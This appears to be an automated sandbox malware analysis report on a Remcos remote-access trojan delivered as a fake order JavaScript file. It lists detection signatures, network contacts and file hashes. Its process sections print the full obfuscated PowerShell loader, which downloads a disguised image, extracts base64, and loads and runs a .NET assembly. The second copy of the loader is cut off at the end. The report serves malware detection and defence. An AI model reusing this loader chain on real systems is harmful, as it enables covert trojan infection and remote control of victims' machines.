Malware Analysis Report

2025-06-16 01:16

Sample ID 231208-e2wd2shb25
Target 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95
SHA256 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95
Tags
remcos remotehost rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95

Threat Level: Known bad

The file 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95 was found to be: Known bad.

Malicious Activity Summary

remcos remotehost rat

Remcos

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-08 04:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-08 04:26

Reported

2023-12-08 04:29

Platform

win7-20231130-en

Max time kernel

121s

Max time network

122s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

Signatures

Enumerates physical storage devices

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g
♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | paste.ee | udp
US | 172.67.187.200:443 | paste.ee | tcp
US | 8.8.8.8:53 | pki.goog | udp
US | 216.239.32.29:80 | pki.goog | tcp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 8.8.8.8:53 | uploaddeimagens.com.br | udp
US | 104.21.45.138:443 | uploaddeimagens.com.br | tcp
US | 8.8.8.8:53 | apps.identrust.com | udp
GB | 96.17.179.184:80 | apps.identrust.com | tcp

Files

memory/2568-18-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2568-19-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/2568-20-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2568-21-0x0000000002200000-0x0000000002280000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 aba4eb063a707d691f8c75c62243e615
SHA1 6731d5a587b9d5ff7de2a1b168be27da7a21348d
SHA256 dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a
SHA512 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc

memory/2568-22-0x0000000002200000-0x0000000002280000-memory.dmp

memory/2568-28-0x0000000002200000-0x0000000002280000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYBBDJZ73VHGL3XUCA4E.temp

MD5 aba4eb063a707d691f8c75c62243e615
SHA1 6731d5a587b9d5ff7de2a1b168be27da7a21348d
SHA256 dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a
SHA512 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc

memory/2712-29-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2712-30-0x00000000029D0000-0x0000000002A50000-memory.dmp

memory/2712-31-0x00000000029D0000-0x0000000002A50000-memory.dmp

memory/2568-32-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2712-33-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2712-34-0x00000000029D0000-0x0000000002A50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab1130.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b1529796de9598023510a36334ef1147
SHA1 7de26a18848dd6cd4d3a5e8bc3672a1375b0c9e5
SHA256 8e22c9d226a3b50a668e73f906e5477dc3f8b35e7683997b3143d4d5d17b35c0
SHA512 2f28969f68ac5623d4becf5c81e53f385266df25d0a5b1f4a548631e37b2786b2edcb96f607a9d931ab3cd0dfd7745e7783430a27348809f79b58c145f241868

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 cca981a13aca69f997066820eeca8ea9
SHA1 4321c495e20ddce52a1025f0a063d73e9d76eba4
SHA256 7f93db5251ea461433650d3baf1068b4b18946f1086621b06f62b4287a982779
SHA512 968df4b4c6ef6da04afb65d20045d8a3a2b001fbef7df33601b312421030771cd628ce6cc287cbc5cb4cee426c196f934927dd8a78fe3ecd792a11f5c5b48280

C:\Users\Admin\AppData\Local\Temp\Tar1133.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0eca7d4a6954c268072754da3b19b4d8
SHA1 290f048633eee6f1d304e8a75013ab58b0d0ffd8
SHA256 b3436bd9676f0cb52fb3aae5365b06830a8a254c1f3979415863f5b70ac5e71c
SHA512 3c7736dda0f7ccef7769af310e4f993ddb1d81b7356ecfe7f88ed1801621501f1c41484287100894aefa7259df9553003fd4a8178162a3f6daf9718865ac06ee

memory/2712-100-0x0000000002CC0000-0x0000000002CCA000-memory.dmp

memory/2712-101-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2568-102-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-08 04:26

Reported

2023-12-08 04:29

Platform

win10v2004-20231127-en

Max time kernel

149s

Max time network

151s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wscript.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4576 set thread context of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1996 wrote to memory of 3240 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 3240 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 4576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 4576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛